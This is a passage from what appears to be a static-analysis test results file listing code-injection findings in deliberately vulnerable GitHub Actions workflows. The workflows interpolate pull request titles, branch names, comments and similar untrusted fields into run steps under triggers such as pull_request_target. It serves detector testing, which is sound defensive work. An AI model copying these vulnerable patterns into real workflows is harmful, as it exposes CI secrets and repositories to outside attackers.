| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
